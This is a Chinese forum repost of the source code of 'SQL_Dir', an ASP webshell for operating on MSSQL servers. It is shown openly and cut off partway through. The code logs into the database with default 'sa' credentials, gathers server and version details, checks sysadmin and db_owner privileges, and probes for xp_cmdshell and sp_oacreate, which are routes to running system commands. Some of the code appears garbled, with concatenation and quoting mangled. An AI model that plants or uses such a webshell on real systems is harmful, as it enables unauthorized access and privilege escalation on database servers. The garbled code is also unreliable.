mssql操作用webshell--sql_dir.asp
4331 点击·0 回帖
灯火互联
楼主
 |  | |
 | 摘自:WowoS Blog <title>SQL_Dir By Bin</title> <style id=theStyle> BODY { FONT-SIZE: 9pt; COLOR: #000000; background-color: #ffffff; FONT-FAMILY: "Courier New"; scrollbar-face-color:#E4E4F3; scrollbar-highlight-color:#FFFFFF; scrollbar-3dlight-color:#E4E4F3; scrollbar-darkshadow-color:#9C9CD3; scrollbar-shadow-color:#E4E4F3; scrollbar-arrow-color:#4444B3; scrollbar-track-color:#EFEFEF; } TABLE { FONT-SIZE: 9pt; FONT-FAMILY: "Courier New"; BORDER-COLLAPSE: collapse; border-width: 1px; border-top-style: solid; border-right-style: none; border-bottom-style: none; border-left-style: solid; border-color: #d8d8f0; } .tr { font-family: "Courier New"; font-size: 9pt; background-color: #e4e4f3; text-align: center; } .td { height: 24px; font-size: 9pt; background-color: #f9f9fd; font-family: "Courier New"; } input { font-family: "Courier New"; BORDER-TOP-WIDTH: 1px; BORDER-LEFT-WIDTH: 1px; FONT-SIZE: 12px; BORDER-BOTTOM-WIDTH: 1px; BORDER-RIGHT-WIDTH: 1px; color: #000000; } textarea { font-family: "Courier New"; BORDER-WIDTH: 1px; FONT-SIZE: 12px; color: #000000; } A:visited { FONT-SIZE: 9pt; COLOR: #333333; FONT-FAMILY: "Courier New"; TEXT-DECORATION: none; } A:active { FONT-SIZE: 9pt; COLOR: #3366cc; FONT-FAMILY: "Courier New"; TEXT-DECORATION: none; } A:link { FONT-SIZE: 9pt; COLOR: #000000; FONT-FAMILY: "Courier New"; TEXT-DECORATION: none; } A:hover { FONT-SIZE: 9pt; COLOR: #3366cc; FONT-FAMILY: "Courier New"; TEXT-DECORATION: none; } tr { font-family: "Courier New"; font-size: 9pt; line-height: 18px; } td { font-size: 9pt; font-family: "Courier New"; border-width: 1px; border-top-style: none; border-right-style: solid; border-bottom-style: solid; border-left-style: none; border-color: #d8d8f0; } .trHead { font-family: "Courier New"; height: 2px; background-color: #e4e4f3; line-height: 2px; } .fixSpan { overflow: hidden; white-space: nowrap; text-overflow: ellipsis; vertical-align: baseline; } .fixTable { word-break: break-all; word-wrap: break-word; } #fileList span{ width: 120px; line-height: 23px; cursor: hand; overflow: hidden; padding-left: 5px; white-space: nowrap; text-overflow: ellipsis; vertical-align: baseline; border: 1px solid #ffffff; } </style> <%if session("login")="" then%> <% Echo "<body onload=document.formx.pass.focus();>" Echo "<table width=816 align=center>" Echo "<form method=post name=formx action=?action=login>" Echo "<tr>" Echo "<td align=center class=td>数 据 库 连 接</td>" Echo "</tr>" Echo "<tr>" Echo "<td height=75 align=center>" Echo "IP:<input name=ip type=text style=border:1px solid #d8d8f0;background-color:#ffffff; value=localhost> " Echo "PORT:<input name=port type=text style=border:1px solid #d8d8f0;background-color:#ffffff; value=1433> " Echo "USER:<input name=user type=text style=border:1px solid #d8d8f0;background-color:#ffffff; value=sa> " Echo "PASS:<input name=pass type=text style=border:1px solid #d8d8f0;background-color:#ffffff;> " Echo "</td>" Echo "</tr>" Echo "<tr>" Echo "<td align=center class=td><input type=submit value=LOGIN style=border:1px solid #d8d8f0;background-color:#f9f9fd;></td>" Echo "</tr>" Echo "<tr>" Echo "<td align=center class=td>2007 @ SQL_DIR By Bin <br><a href=http://www.rootkit.net.cn target=_blank>www.rootkit.net.cn</a></td>" Echo "</tr>" Echo "</form>" Echo "</table>" Echo "</body>" %> <%End If %> <% If request("action")="login" Then SqlLocalName ="";request.Form("ip");",";request.Form("port");"" 连接IP [ 本地用 (local) 外地用IP ] SqlUserName ="";request.Form("user");"" 用户名 SqlPassword ="";request.Form("pass");"" 用户密码 SqlDatabaseName="sql" 数据库名 ConnStr = "Provider=Sqloledb;User ID=" ; SqlUserName ; "; Password=" ; SqlPassword ; "; Initial CataLog = " ; SqlDatabaseName ; "; Data Source=" ; SqlLocalName ; ";" SqlNowString="GetDate()" On Error Resume Next 容错 Set Conn=Server.CreateObject("ADODB.Connection") Conn.open ConnStr If Err.number=-2147467259 Then Echo "<script language=javascript> alert(主机IP或者端口连接错误,请检查!);history.back(); </script>" ElseIf Err.number=-2147217843 Then Echo "<script language=javascript> alert(用户名或者密码错误,请检查!);history.back(); </script>" End If If Err.number=0 Then session("login")="yes" session("user")=request.Form("user") session("pass")=request.Form("pass") session("ip")=request.Form("ip") session("port")=request.Form("port") End If response.redirect"?action=tools" End If %> <% If request("action")="tools" or request("action")="" Then If session("login")="yes" Then %> <% rem----------------------------数据库连接----------------- ConnStr = "Provider=Sqloledb.1;User ID=" ;session("user"); "; Password=" ;session("pass"); "; Initial CataLog = " ; SqlDatabaseName ; "; Data Source=" ; session("ip") ; ",";session("port");";" Set Conn=Server.CreateObject("ADODB.Connection") Conn.open ConnStr Set Cat = Server.CreateObject("ADOX.Catalog") Cat.ActiveConnection = conn.ConnectionString rem------------------------函数------------- Sub Echo(sStr) Response.Write sStr End Sub Function IIf(var, val1, val2) If var = True Then IIf = val1 Else IIf = val2 End Function const copyright = "Code By Bin<br><a href = http://www.rootkit.net.cntarget=_blank>www.rootkit.net.cn</a>" RootPath = Server.MapPath("/") Path=Request.ServerVariables("PATH_TRANSLATED") Server_Name=Request.ServerVariables("SERVER_NAME") IP=Request.ServerVariables("LOCAL_ADDR") PORT=Request.ServerVariables("SERVER_PORT") OS= Request.ServerVariables("OS") OS= IIf(OS = "", "Windows2003", OS) ; ", " ; Request.ServerVariables("SERVER_SOFTWARE") OS= OS ; ", " ; ScriptEngine ; "/" ; ScriptEngineMajorVersion ; "." ;ScriptEngineMinorVersion ; "." ; ScriptEngineBuildVersion Curl=Request.ServerVariables("SCRIPT_NAME") RequestUrl=Request.ServerVariables("Url") URL="http://";Server_Name;Requesturl rem-------------------------------------- rem-----------------------数据库操作-------------------- Set rs = conn.execute("select @@version") SQLversion=rs(0) Set rs = Conn.execute("select db_name(0)") DBname=rs(0) Set rs = Conn.execute("select user") DBuser=rs(0) 权限判断 Set rs = Conn.execute("Select IS_SRVROLEMEMBER(sysadmin)") If rs(0)=1 Then dbo="sa" End If Set rs = Conn.execute("Select IS_MEMBER(db_owner)") If rs(0)=1 Then dbo="db_owner" Else dbo="public" End If 扩展判断 Set rs = Conn.execute("select count(*) from master.dbo.sysobjects where xtype=X and name=xp_cmdshell") If rs(0)=1 Then xp_cmdshell="XP_cmdshell √" Else xp_cmdshell="XP_cmdshell ×" End If Set rs = Conn.execute("select count(*) from master.dbo.sysobjects where xtype=X and name=sp_oacreate") If rs(0)=1 Then sp_oacreate="SP_oacreate √" | |
 |  |